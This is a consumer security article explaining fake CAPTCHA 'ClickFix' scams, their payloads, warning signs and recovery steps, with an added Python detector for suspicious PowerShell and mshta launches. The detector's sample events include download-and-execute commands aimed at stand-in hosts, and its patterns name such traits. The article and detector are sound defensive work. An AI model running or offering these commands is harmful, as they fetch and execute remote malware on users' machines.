Security checks exist to keep bots out, but scammers have flipped the script. Fake CAPTCHA scams use the exact tools designed to protect you as a disguise to hack your computer.
Fake verification pages do not test if you are human. They trick you into installing malware on your own device. You try to prove you are not a robot, and in the process, you hand over the keys to your system.
This article breaks down exactly how the ClickFix technique works, what happens when you press enter, and how to stop the attack in its tracks.
In a Nutshell
A fake CAPTCHA scam is a malicious webpage that mimics a human verification test to trick you into manually running computer commands. Real CAPTCHAs ask you to click traffic lights or tick a box. Fake CAPTCHA malware uses a technique called ClickFix, where the page silently copies a hidden, malicious script to your computer's clipboard the moment you click "Verify".
The page then gives you step-by-step instructions designed to look like a standard security check. It tells you to press "Windows Key + R" to open the Run menu, press "Ctrl + V" to paste a verification code, and hit Enter. Because you believe you are just pasting a harmless code, your guard is down.
The moment you press Enter, you execute that hidden script. Behind the scenes, the command launches legitimate Windows tools like PowerShell or mshta.exe—programs that execute scripts—to download and install malware directly onto your machine.
In Q3 2024, researchers observed a significant rise in fake CAPTCHA campaigns. By April 2025, nearly 11% of all phishing emails globally were sent using trusted platforms. These campaigns have delivered destructive malware including Lumma Stealer, Rhadamanthys, AsyncRAT, and XWorm.
Fake CAPTCHA scams spread primarily through hijacked search results, malicious ads, and deceptive emails. You might search for a common software download and click an ad—known as malvertising—that redirects you to a fake verification page. Attackers also use SEO poisoning, a tactic where they manipulate search engines to make their fraudulent sites rank at the top of your results.
Other times, you might click a link in a phishing email or land on a legitimate website that a hacker has compromised with injected scripts. Once you arrive, the site blocks the content you want and displays the fake "I am not a robot" prompt.
You cannot rely on blocking a single bad web address to stay safe. Attackers regularly swap URLs to evade detection after cybersecurity firms take their pages down.
Fake CAPTCHAs install aggressive software designed to steal your data or take complete control of your device. The most common payloads are info stealers like Lumma Stealer, StealC, and Rhadamanthys, which silently harvest your saved passwords, browser cookies, and cryptocurrency wallets. By stealing your active session cookies, hackers bypass two-factor authentication and walk right into your accounts.
Other campaigns drop Remote Access Trojans (RATs) such as AsyncRAT or XWorm, which give attackers a hidden backdoor to watch your screen and control your device. You might also encounter multi-stage loaders like Emmenhtal—malware that acts as a delivery truck, dropping a series of additional viruses onto your system over time.
This threat also targets smartphones through a specific mobile variant. Some fake CAPTCHAs on phones trick you into sending an automated text message to "prove you are human," which actually triggers international SMS fraud and runs up phone bills of around $30 per victim.
You can identify a fake CAPTCHA because it always asks you to perform actions outside of your web browser, like opening system menus or copying text. A legitimate security check will only ever ask you to interact directly with the webpage itself.
| Legitimate CAPTCHA | Fake CAPTCHA |
| --- | --- |
| Asks you to tick a box or solve a visual puzzle | Asks you to open the Windows Run dialog (Win+R) or a terminal |
| Never involves keyboard shortcuts | Gives step-by-step keyboard instructions |
| Never asks you to copy-paste anything | Copies a command silently to your clipboard |
| Always on the website you intended to visit | Often appears on unfamiliar domains or pop-up pages |
| Does not ask you to download files | May include tutorial videos guiding you through system steps |
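The ClickFix chain described above (a script host such as PowerShell or mshta.exe launched from the Run dialog with a download-and-execute command) leaves a recognisable trace in process-creation telemetry. The detector below is an added example written for this article, not code from ScamAdviser or the author; it assumes Sysmon-style field names (Image, ParentImage, CommandLine) and runs over constructed sample events.

```python
import re
from typing import Dict, List
# Script hosts the article names (PowerShell, mshta.exe) plus close relatives.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Command-line traits that separate a pasted payload from routine admin use.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
}

def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Indicator names that make one process-creation event look like ClickFix
    (empty list = not flagged). Rule: a script host whose parent is explorer.exe,
    which is what the Win+R Run dialog spawns from, with a suspicious command line."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]
def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch and keep only the flagged events."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"image": basename(ev["Image"]), "indicators": hits})
    return findings

# Constructed sample events (Sysmon-style field names; invented paths and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": EXPLORER,  # pasted into Run: flagged
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://captcha.example.invalid/v)"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EXPLORER,  # flagged
     "CommandLine": "mshta https://captcha.example.invalid/verify.hta"},
    {"Image": PS, "ParentImage": EXPLORER,  # ordinary Run-dialog use: not flagged
     "CommandLine": "powershell -NoExit -Command Get-Date"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",  # scripted admin task
     "CommandLine": 'powershell -c "iwr https://updates.example.invalid/a.ps1"'},
]
```

On a real host the same rule applies to Sysmon Event ID 1 or Windows Security event 4688 records with command-line auditing enabled.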
If you pasted and ran the command, you must immediately disconnect your device from the internet to sever the attacker's connection. Pull the ethernet cable or turn off your Wi-Fi router to stop the malware from sending your stolen passwords back to the hacker.
You protect yourself by treating any request to use keyboard shortcuts like Windows Key + R as an immediate, severe security threat. Websites cannot force you to open system menus, so they have to use psychological tricks to convince you to do it yourself.
Be highly skeptical of any CAPTCHA that appears on a pop-up, a suspicious domain, or a free content-streaming site. You can reduce your exposure by using a browser extension that blocks malicious domains and keeping your operating system and antivirus software fully updated.
For high-risk browsing, consider disabling JavaScript on unknown sites or using a dedicated, isolated browser. If you are on a smartphone, never send an SMS to verify your identity—legitimate CAPTCHAs will never open your messaging app to send premium texts.
The fake CAPTCHA scam is brilliantly deceptive because it turns your own security habits against you. You are conditioned to click buttons to prove you are human, making the request feel routine and harmless.
This attack exploits routine human behavior. The hackers need you to manually run their code, so they disguise the payload as a standard verification step.
If a website ever asks you to press the Windows key or paste a command to prove you are human, close the tab immediately.
Frequently Asked Questions
Can my antivirus block a fake CAPTCHA?
Your antivirus might catch the malware after it downloads, but it cannot prevent you from manually pasting and running the malicious command.
Does clicking the verify button install the malware?
Clicking the button only copies the malicious code to your clipboard; the actual infection happens when you paste and press Enter.
Are fake CAPTCHAs only dangerous on Windows computers?
While the fake CAPTCHA Windows Run dialog trick targets PCs, mobile variants of this scam trick users into sending premium-rate text messages.
How do hackers hide the malicious command from me?
The fake CAPTCHA page copies the code silently to your clipboard so that when you paste it into the Run prompt, you execute it without reading it.
Adam Collins is a cybersecurity researcher at ScamAdviser who operates under a pseudonym for privacy and security. With over four years on the digital frontlines, he specialises in translating complex threats into actionable advice. His mission: exposing red flags so you can navigate the web with confidence.